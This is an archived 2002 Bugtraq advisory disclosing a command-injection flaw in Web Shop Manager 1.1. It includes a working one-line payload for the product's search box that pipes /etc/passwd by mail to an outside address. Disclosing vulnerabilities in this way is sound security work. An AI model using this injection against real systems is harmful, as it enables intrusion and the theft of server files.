[26674] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

Web Shop Manager Security Vulnerability

daemon@ATHENA.MIT.EDU (Tacettin Karadeniz)
Thu Aug 15 13:57:30 2002

Message-ID: <20020815101537.90792.qmail@web21307.mail.yahoo.com>
Date: Thu, 15 Aug 2002 03:15:37 -0700 (PDT)
From: Tacettin Karadeniz <tacettinkaradeniz@yahoo.com>
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii

Summary 
The Web Shop
Manager(http://www.webscriptworld.com/scripts/wsm.phtml)
allows you to manage a fully functional online store
from a centralized web-based administration system. A
security vulnerability in the product allows executing
of arbitrary commands with the privileges of the
script file used by the product.

Details 
Vulnerable systems:
 * Web Shop Manager version 1.1

Exploit:
It is possible to send server's password file any mail
address by writing the following command in Web Shop
Manager's search box:

 |mail user@host.com < /etc/passwd

__________________________________________________
Do You Yahoo!?
HotJobs - Search Thousands of New Jobs
http://www.hotjobs.com


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[26674] in bugtraq

Web Shop Manager Security Vulnerability

daemon@ATHENA.MIT.EDU (Tacettin Karadeniz)Thu Aug 15 13:57:30 2002

daemon@ATHENA.MIT.EDU (Tacettin Karadeniz)
Thu Aug 15 13:57:30 2002